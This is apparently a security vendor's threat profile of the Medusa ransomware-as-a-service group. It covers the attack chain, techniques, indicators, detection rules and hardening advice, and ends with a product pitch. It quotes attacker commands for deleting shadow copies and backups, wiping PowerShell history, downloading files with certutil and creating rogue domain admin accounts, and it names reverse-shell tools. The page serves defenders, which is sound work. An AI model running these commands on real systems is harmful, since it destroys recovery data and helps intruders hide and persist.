Home

Medusa Ransomware

Ransomware-as-a-Service · First seen June 2021

Overview

Medusa is a ransomware-as-a-service operation first observed in June 2021. It operates a double-extortion model: affiliates encrypt victim systems while the core group simultaneously exfiltrates sensitive data. Victims who refuse to pay face publication of their data on the Medusa Blog, a Tor-hosted leak site with a countdown timer visible to anyone. Ransoms have ranged from $100,000 to $15 million depending on victim size, per CISA AA25-071A.

The group is not to be confused with the MedusaLocker ransomware family (a separate, older variant) or the Medusa Android banking trojan. The Windows-targeting RaaS addressed here gained significant attention following a joint CISA/FBI/MS-ISAC advisory (AA25-071A) published March 12, 2025, documenting over 300 victims across healthcare, education, legal, insurance, technology, and manufacturing sectors.

Microsoft Threat Intelligence reported in April 2026 that Storm-1175 has deployed Medusa ransomware in high-tempo operations targeting vulnerable web-facing systems. In some cases, the activity moved from successful exploitation to data exfiltration and ransomware deployment within 24 hours.

Medusa affiliates gain initial access primarily through phishing campaigns and exploitation of unpatched internet-facing services. CISA documents the group exploiting ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass) and the Fortinet EMS SQL injection CVE-2023-48788 - both common in observed intrusions. A significant share of access is purchased from Initial Access Brokers (IABs), whom Medusa developers actively recruit on cybercriminal forums with offers of $100 to $1 million per access. After establishing a foothold, affiliates spend time conducting internal reconnaissance and lateral movement before deploying the ransomware payload. Defense evasion centers on a Bring Your Own Vulnerable Driver (BYOVD) attack using a custom signed driver (ABYSSWORKER) to disable endpoint detection, along with PowerShell command history removal.

The payload - a binary named gaze.exe per CISA's investigation - uses AES-256 for file encryption. Before encrypting, gaze.exe terminates services related to backups, security, databases, communication, file sharing, and websites, then deletes Volume Shadow Copies. Every encrypted file receives a .medusa extension and a ransom note (!!!READ_ME_MEDUSA!!!.txt) is dropped in each affected directory. Victims are given 48 hours to make contact through a Tor-based live chat or the Tox end-to-end encrypted messenger; non-responding victims are pursued directly by phone or email. The Medusa .onion leak site displays a countdown timer, and victims can pay $10,000 in cryptocurrency to add a day to it.

Operational attack chain · Medusa RaaS kill chain
  1. Start

    Initial access

    Phishing · RDP · IAB purchase

  2. 1
    Stage 1

    Recon & persistence

    Network scanners · domain account creation

  3. 2
    Stage 2

    Defense evasion

    ABYSSWORKER BYOVD · VSS delete · history wipe

  4. 3
    Stage 3

    Lateral movement

    RDP · PsExec · RMM tools

    T1021.001T1569.002
  5. 4
    Stage 4

    Data exfiltration

    Rclone → Medusa C2 servers

  6. 5
    Stage 5

    Encryption

    gaze.exe · AES-256 · .medusa ext

  7. Impact

    Double extortion

    Tor leak site + countdown timer

Tactics, techniques, and procedures

MITRE ATT&CK Enterprise coverage across the Medusa kill chain. Highlighted rows indicate tactics where Medusa exhibits distinctive or high-impact behavior.

MITRE ATT&CK coverageHeavyActiveNot observed
Recon0Resource Dev0Initial Access2Execution3Persistence1Priv. Esc0Defense Evasion4Credential Access2Discovery5Lateral4Collection1C22Exfiltration1Impact5
Technique detailKey techniques · Medusa Ransomware
TacticTechniquesNotes
Initial Access
Phishing T1566Public-Facing App Exploit T1190
Per CISA: phishing campaigns for credential theft, plus exploitation of ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass, CWE-288) and Fortinet EMS SQL injection CVE-2023-48788. Medusa developers actively recruit Initial Access Brokers (IABs) on cybercriminal forums with offers of $100 to $1 million per access.
Execution
PowerShell T1059.001Windows Command Shell T1059.003Software Deployment Tools T1072
PowerShell used throughout for staging, enumeration, and payload delivery. PsExec and WMIC used to execute commands on remote hosts. Legitimate RMM tools (PDQ Deploy, ConnectWise) abused for lateral distribution.
Persistence
Create Domain Account T1136.002
CISA documents Medusa creating domain accounts to maintain access. Observed commands include net user /add default <password> /domain followed by additions to Domain Admins, Enterprise Admins, and Remote Desktop Users groups.
Defense Evasion
Disable Security Tools T1562.001Rootkit / BYOVD T1014Clear Command History T1070.003Encrypted/Encoded File T1027.013
A signed kernel driver (ABYSSWORKER / smuol.sys) is loaded to terminate EDR processes at ring-0. PowerShell command history is wiped via Remove-Item (Get-PSReadlineOption).HistorySavePath. PowerShell payloads obfuscated with base64 encoding, string-concatenation tricks, and gzip-compressed in-memory script blocks. Volume Shadow Copies deleted via vssadmin.exe Delete Shadows /all /quiet (mapped under Impact as T1490). certutil -f urlcache used for file ingress.
Credential Access
LSASS Memory Dump T1003.001Password Brute Force T1110.001
Mimikatz or similar tools used to harvest NTLM hashes and Kerberos tickets from LSASS memory, enabling pass-the-hash and pass-the-ticket lateral movement without cracking passwords.
Discovery
Network Service Discovery T1046Network Share Discovery T1135File Discovery T1083Domain Groups T1069.002System Information T1082
Advanced IP Scanner and SoftPerfect Network Scanner used for network enumeration. Native Windows commands (net share, net group "domain admins" /domain, nltest /dclist:, systeminfo) supplement. Commonly scanned ports include 21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389.
Lateral Movement
RDP T1021.001System Services / PsExec T1569.002Remote Access Software T1219Software Deployment Tools T1072
RDP enabled cluster-wide via openrdp.bat (creates firewall rule for port 3389, enables WMI, sets fDenyTSConnections=0). PsExec used to copy and execute batch scripts as SYSTEM. Affiliates also leverage existing RMM tools in the victim environment (AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp, Splashtop) to blend in. PDQ Deploy and BigFix used to push the encryptor across the domain. (T1072 also listed under Execution; Medusa uses deployment tools for both remote command execution and lateral encryptor distribution.)
Collection
Network-Shared Drive Data T1039
Network shares, file servers, and backup repositories enumerated and targeted. Sensitive documents, financial records, PII, and credentials prioritized for exfiltration leverage.
Command and Control
Web Protocols T1071.001Ingress Tool Transfer T1105
Reverse / bind shells over port 443 (HTTPS) using the open-source powerfun.ps1 stager. Ligolo used for reverse tunneling; Cloudflared (formerly ArgoTunnel) used to expose internal services via Cloudflare Tunnel without direct exposure.
Exfiltration
Exfil to Cloud Storage T1567.002
CISA documents Rclone exfiltrating data to Medusa C2 servers (T1567.002). Exfiltration precedes encryption - the double-extortion leverage is established before the victim is aware of compromise.
Impact
Data Encrypted for Impact T1486Financial Theft / Extortion T1657Inhibit System Recovery T1490Service Stop T1489System Shutdown/Reboot T1529
AES-256 encrypts file contents. Encrypted files get .medusa extension. Ransom note dropped in each directory. Shadow copies and backups pre-deleted. Before encryption, gaze.exe terminates services related to backups, security, databases, communication, file sharing, and websites (T1489). After encryption, actors manually shut down and encrypt virtual machines (T1529). Victims face simultaneous encryption and threatened data publication on Tor leak site.
Stage 1T1566 · T1190

Initial access and foothold

CISA documents two primary initial access patterns for Medusa. The first is phishing campaigns conducted by Initial Access Brokers to steal victim credentials. The second is exploitation of unpatched, internet-facing applications - specifically named in the advisory are ConnectWise ScreenConnect CVE-2024-1709 (an authentication bypass, CWE-288) and Fortinet EMS SQL injection CVE-2023-48788 (CWE-89).

A significant portion of Medusa intrusions begin with a purchased foothold rather than a fresh compromise. Medusa developers actively recruit IABs on cybercriminal forums and marketplaces, offering payments between $100 and $1 million per access with the opportunity to work exclusively for Medusa. This means that by the time Medusa activity is detectable, the initial intrusion may have already been carried out weeks or months earlier by a separate actor.

Stage 2T1046 · T1135 · T1069.002 · T1082 · T1136.002

Reconnaissance and persistence

After establishing a foothold, Medusa actors use a combination of legitimate scanning tools and native Windows commands for enumeration. CISA names Advanced IP Scanner and SoftPerfect Network Scanner as the primary discovery tools. Native commands fill in the gaps: net share for shared drives, net group "domain admins" /domain for high-value accounts, nltest /dclist: for domain controller enumeration, and systeminfo for host fingerprinting.

Commonly scanned ports include 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL), 3050 (Firebird), 3128 (HTTP proxy), 3306 (MySQL), and 3389 (RDP).

Persistence is established via domain account creation - CISA documents the exact commands: net user /add default <password> /domain followed by additions to Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners, and Schema Admins groups. These rogue accounts give affiliates continued access even if the original entry point is closed.

Stage 3T1562.001 · T1014 · T1070.003 · T1027.013

Defense evasion: BYOVD and indicator removal

Medusa's most technically significant evasion technique is Bring Your Own Vulnerable Driver (BYOVD). Threat intelligence reporting in March 2025 attributed Medusa intrusions to a custom signed kernel driver named ABYSSWORKER (filename smuol.sys), deployed via a loader packed with the HeartCrypt packer-as-a-service. The driver is signed using stolen or revoked certificates from Chinese vendors and is engineered to mimic a legitimate signed EDR driver, allowing it to load on systems that would normally reject unsigned or unknown kernel components. Once loaded at ring-0, ABYSSWORKER is used to terminate or blind endpoint detection and response agents from kernel context, where most user-space security tools cannot observe or intervene. ABYSSWORKER artifacts have been observed on VirusTotal from August 2024 through February 2025.

Indicator removal follows. CISA documents Medusa wiping PowerShell command line history with Remove-Item (Get-PSReadlineOption).HistorySavePath, and using multiple PowerShell evasion patterns: base64-encoded commands via -enc, sliced/concatenated strings, and gzip-compressed in-memory scriptblocks. Volume Shadow Copies are deleted via vssadmin. The encryptor gaze.exe then automatically terminates services related to backups, security, databases, communication, file sharing, and websites (T1489).

Defense evasion commands documented in CISA AA25-071A (Appendix A)
powershell -exec bypass -enc <base64 encrypted command string>

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

vssadmin.exe Delete Shadows /all /quiet

cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0

del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf

Source: CISA AA25-071A, Appendix A - Medusa Commands

Stage 4T1021.001 · T1569.002 · T1219 · T1072 · T1567.002

Lateral movement and data exfiltration

Lateral movement uses RDP, PsExec, and existing remote access software in the victim environment. CISA documents Medusa actors leveraging whichever RMM tools are already present - observed examples include AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp, and Splashtop - to blend with legitimate administrator traffic. The batch script openrdp.bat is used to open RDP cluster-wide: it adds a firewall rule for port 3389, enables remote WMI connections, and sets the registry value fDenyTSConnections to 0. PsExec then copies and executes payloads with SYSTEM-level privileges.

Mimikatz is observed for LSASS dumping (T1003.001) to harvest credentials and support lateral movement. The encryptor binary gaze.exe is distributed across the domain via PsExec, PDQ Deploy, or BigFix immediately before detonation.

Data exfiltration happens before encryption, establishing the extortion leverage independently of the encryption impact. CISA confirms Medusa actors use Rclone to exfiltrate data to Medusa C2 servers - not third-party cloud storage. For command-and-control infrastructure, CISA also documents the use of Ligolo (a reverse tunneling tool) and Cloudflared (formerly ArgoTunnel) to securely expose victim resources to attacker infrastructure.

  • openrdp.bat (MD5: 44370f5c977e415981febf7dbb87a85c per CISA) - durable IOC for RDP enablement
  • pu.exe (MD5: 80d852cd199ac923205b61658a9ec5bc) - reverse shell, identified in CISA Table 1
  • The powerfun.ps1 open-source stager script is used to create TLS reverse or bind shells over port 443
Stage 5T1486 · T1657 · T1489 · T1490 · T1529

Encryption and double extortion

The Medusa ransomware encryptor is named gaze.exe per CISA's investigation. It is deployed across the network via Sysinternals PsExec, PDQ Deploy, or BigFix, with antivirus and endpoint protection services disabled on specific targets before detonation. Encrypted files receive the .medusa extension; the ransom note !!!READ_ME_MEDUSA!!!.txt is written into every directory traversed.

The encryption sequence is documented by CISA: gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites (T1489), then deletes shadow copies (T1490), then encrypts files with AES-256 before dropping the ransom note. After encryption, the actors manually shut down and encrypt virtual machines (T1529) and delete their previously installed tools to hinder forensic reconstruction.

Victims have 48 hours to make contact via either a Tor-based live chat or Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond, Medusa actors reach out directly by phone or email; CISA Table 2 lists five extortion email addresses used for negotiation, including key.medusa.serviceteam@protonmail.com and MedusaSupport@cock.li. The Medusa .onion leak site displays victim entries alongside countdown timers; data is simultaneously advertised for sale to interested third parties before the timer ends. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

CISA also documents a triple extortion pattern observed in at least one case: after paying the ransom, a victim was contacted by a separate Medusa actor claiming the original negotiator had stolen the funds and demanding half the payment again to provide the "true decryptor."

Process tree

What the Medusa kill chain looks like in EDR telemetry

Indicators of compromise

Durable behavioral IOCs: file paths, registry keys, process patterns, and network behaviors consistent across Medusa campaigns. These survive variant rotation better than hash-based indicators.

File paths & binaries

7 indicators

Filenames and locations documented in CISA AA25-071A and follow-on threat intelligence reporting.

  • gaze.exeMedusa encryptor binary (CISA-confirmed)
  • smuol.sysABYSSWORKER kernel driver - mimics a signed EDR driver; signed with stolen Chinese vendor certs
  • openrdp.batRDP enablement script - MD5 44370f5c977e415981febf7dbb87a85c
  • pu.exeReverse shell - MD5 80d852cd199ac923205b61658a9ec5bc
  • !!!READ_ME_MEDUSA!!!.txtRansom note dropped in all encrypted directories
  • [filename].medusaEncrypted file extension
  • \\<host>\sysvol\gaze.exeStaging location observed on domain controllers

Registry & account artifacts

4 indicators

Registry and account modifications documented in CISA AA25-071A Appendix A.

  • HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0Restricted Admin mode disabled to allow credential-relay over RDP
  • HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 0RDP enabled via openrdp.bat
  • HKLM\SYSTEM\CurrentControlSet\Services\[svc]Service registration for the ABYSSWORKER kernel driver (smuol.sys)
  • net user /add default <pwd> /domainRogue domain account creation; followed by Domain Admins group addition

Process behaviors

High fidelity

Behavioral patterns from CISA Appendix A - these combinations are rarely legitimate.

  • vssadmin.exe Delete Shadows /all /quietVSS deletion - direct CISA-confirmed Medusa command
  • powershell Remove-Item (Get-PSReadlineOption).HistorySavePathPowerShell command history deletion
  • certutil -f urlcache https://<d>/<f>.msiLiving-off-the-land file ingress via certutil
  • psexec.exe -accepteula -s \\<host> -c <script>.batBatch scripts deployed: openrdp.bat, StopAllProcess.bat, newuser.bat, zam.bat

Network & contact indicators

5 indicators

Network patterns and contact channels from CISA AA25-071A Tables 1-2.

  • Cloudflared (ArgoTunnel) trafficCloudflare Tunnel used to expose victim resources without direct port exposure
  • Ligolo reverse tunnelReverse tunneling between victim and threat actor infrastructure
  • Reverse / bind shell on TCP/443PowerShell stager (powerfun.ps1) opens TLS shell on 443
  • key.medusa.serviceteam@protonmail.comRansom negotiation address - one of five in CISA Table 2
  • MedusaSupport@cock.liRansom negotiation address - CISA Table 2

Detection guidance

Six detection opportunities across the Medusa kill chain, ordered by earliest point of intervention. Detections 1-3 fire days to weeks before encryption; detections 4-6 fire during the final attack stages.

  1. 01

    ABYSSWORKER kernel driver load - Medusa-specific BYOVD

    EDR / kernel telemetry

    Alert on kernel driver loads matching smuol.sys by hash, by filename, or by the signature pattern: signed by a Chinese-vendor certificate that has been revoked, with file metadata that mimics a legitimate EDR product. Supplement with sc.exe create events that register a kernel-mode service from a non-system path (e.g. %TEMP%, %ProgramData%). Cross-reference loaded drivers against the LOLDrivers dataset.

    Why it works: ABYSSWORKER is a reported BYOVD payload observed in Medusa intrusions. Detecting suspicious driver loads before security tools are impaired gives defenders an earlier intervention point. Generic vulnerable-driver blocklists may not cover newly observed custom-signed drivers immediately, so explicit monitoring for suspicious driver registration, revoked certificate use, and non-standard driver paths is recommended.

  2. 02

    PowerShell command history deletion & obfuscated encoded execution

    EDR / Script-block logging

    Alert on the exact CISA-documented Medusa command Remove-Item (Get-PSReadlineOption).HistorySavePath - this is a verbatim Medusa indicator. Combine with detection for PowerShell launched with -exec bypass -enc (base64-encoded commands), and for the string-concatenation pattern CISA documents: $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le' obfuscating DownloadFile. Also alert on the gzip-decompression scriptblock pattern documented in the advisory.

    Why it works: The history deletion command is listed in CISA Appendix A and has limited legitimate administrative use outside approved maintenance activity. Treat it as high-risk when paired with encoded execution, suspicious parent processes, or other Medusa-linked behaviors. This catches Medusa earlier in the kill chain than VSS deletion does.

  3. 03

    Advanced IP Scanner / SoftPerfect Network Scanner on internal hosts

    EDR / process telemetry

    Alert on execution of advanced_ip_scanner.exe or SoftPerfect Network Scanner binaries from non-admin workstations or servers. Supplement with detection for CISA-documented native enumeration commands: net group "domain admins" /domain, nltest /dclist:, net share, and systeminfo when executed by a non-administrator security principal or from an unusual parent process (e.g., powershell.exe launched by a service account).

    Why it works: CISA names Advanced IP Scanner and SoftPerfect Network Scanner explicitly as Medusa's enumeration tools. They are commercially available and not strictly malicious, but their presence outside of legitimate IT inventory operations is a high-confidence reconnaissance indicator. Detection here fires days before payload deployment.

  4. 04

    Rclone execution and sustained outbound traffic

    Proxy / DLP / process telemetry

    Alert on rclone.exe execution - including renamed binaries identifiable by their PE imports and behavior (opening rclone.conf, repetitive HTTPS POSTs with chunked uploads). At the network layer, alert on the rclone/ HTTP User-Agent string in proxy logs, and on sustained high-volume outbound traffic to any external endpoint from non-browser processes. CISA documents Medusa exfiltrating to its own C2 servers; the destination IPs and domains rotate frequently, so detection should not depend on a static destination list.

    Why it works: Rclone has limited legitimate use in tightly managed enterprise environments, but unexpected execution on servers or user endpoints is high-risk. Its presence - even renamed - is a high-confidence indicator of active exfiltration. Detection here prevents the double-extortion leverage from being established.

  5. 05

    Volume Shadow Copy deletion

    EDR / Windows event logs

    Alert on the exact CISA-documented command vssadmin.exe Delete Shadows /all /quiet. Also alert on bulk deletion of backup file types via del /s /f /q targeting *.VHD, *.bak, *.bkf, *.wbcat - this is a verbatim Medusa command sequence from CISA Appendix A.

    Why it works: Shadow copy deletion is a near-universal ransomware indicator and is documented verbatim for Medusa. Deleting all VSS copies plus backup archive files in sequence is rarely legitimate outside a documented maintenance or recovery workflow. This cluster fires reliably regardless of payload variant.

  6. 06

    Encryptor binary gaze.exe and rapid .medusa extension change

    File integrity monitoring / EDR

    Alert on execution of any process named gaze.exe regardless of path. Combine with file integrity monitoring detection for any process generating more than ~100 file rename/overwrite events per second across multiple directories where the resulting extension is .medusa, and on the creation of files named !!!READ_ME_MEDUSA!!!.txt.

    Why it works:gaze.exe is the CISA-confirmed encryptor binary name. The mass-rename behavior is a late-stage indicator - it cannot prevent encryption of already-processed files, but it enables rapid network isolation to limit spread across the environment to still-unencrypted shares and remote systems.

Hardening recommendations

Five controls that directly address the Medusa kill chain. Items tagged Quick win can be deployed via single GPO or policy change within days. Standard items require phased rollout or change control processes.

  1. Enable Microsoft HVCI and apply the vulnerable driver blocklist

    Standard

    Hypervisor-Protected Code Integrity (HVCI) prevents unsigned or blocklisted kernel drivers from loading. Note that Medusa's ABYSSWORKER (smuol.sys) is a custom-signed driver using stolen Chinese-vendor certificates - it may not appear on default blocklists immediately. Subscribe to certificate revocation feeds and ingest community driver telemetry (LOLDrivers) to keep WDAC policies current.

    Path: Windows Security → Device Security → Core isolation → Memory integrity. Enforce via MDM policy: ./Vendor/MSFT/Policy/Config/VirtualizationBasedTechnology/HypervisorEnforcedCodeIntegrity. Requires compatible hardware.

  2. Disable RDP on all endpoints not requiring it; enforce NLA and MFA on servers

    Quick win

    Medusa actors use RDP as a primary lateral movement mechanism, enabling the encryptor with openrdp.bat cluster-wide after initial compromise. Disabling RDP on workstations via GPO eliminates a key lateral spread path. For servers that require RDP, enforce Network Level Authentication and require MFA through a PAM or jump-server architecture. Restricting RDP also reduces exposure to IAB-sold access, which frequently relies on compromised RDP credentials.

    Path: Computer Configuration → Administrative Templates → Windows Components → Remote Desktop Services → Remote Desktop Session Host → Connections → Allow users to connect remotely (set to Disabled for non-servers).

  3. Implement a tiered Active Directory model; restrict lateral movement paths

    Standard

    Medusa's lateral movement depends on domain admin credentials being reachable from compromised workstations via pass-the-hash. Microsoft's Enterprise Access Model (formerly tiered AD model) separates Tier 0 (domain controllers) from Tier 1 (servers) from Tier 2 (workstations), preventing harvested workstation credentials from reaching domain admin context.

    Path: Implement via Protected Users security group for admin accounts, Credential Guard to protect LSASS, and PAWs (Privileged Access Workstations) for admin tasks. See Microsoft Enterprise Access Model documentation.

  4. Alert on or block vssadmin delete shadows via application control

    Quick win

    Ad-hoc deletion of all Volume Shadow Copies outside a documented maintenance window should be treated as high-risk. Implement an EDR custom rule to alert immediately on vssadmin delete shadows /all - or, in environments with mature change control, block it entirely via AppLocker or WDAC for non-admin contexts.

    Path: EDR behavioral rule or WDAC policy restricting vssadmin.exe with delete shadows arguments for non-elevated contexts. Audit mode first to identify legitimate usage.

  5. Maintain offline, tested, immutable backups - and test restoration quarterly

    Quick win

    Medusa deletes VSS copies, Windows Backup catalogs, and targets backup servers for encryption. Air-gapped or immutable backups (3-2-1 rule: 3 copies, 2 media types, 1 offsite/offline) are the primary recovery control if all detection and prevention controls fail. Untested backups that cannot be restored within the incident window provide no operational value.

    Path: Implement write-once cloud storage tiers (AWS S3 Object Lock, Azure immutable blob) or offline tape rotation. Conduct quarterly restoration drills, measuring RTO against business recovery objectives. Backup agent credentials should not be reachable from domain-joined machines.

Primary references

Source material this page is built on. Last reviewed against CISA, FBI, and Microsoft threat reporting through June 2026.

Test your defenses against Medusa's BYOVD-to-ransomware kill chain.

Malware Protection Plus detects behavioral kill-chain patterns - BYOVD driver loads, VSS deletion, mass encryption - before data is lost.

Start free trial →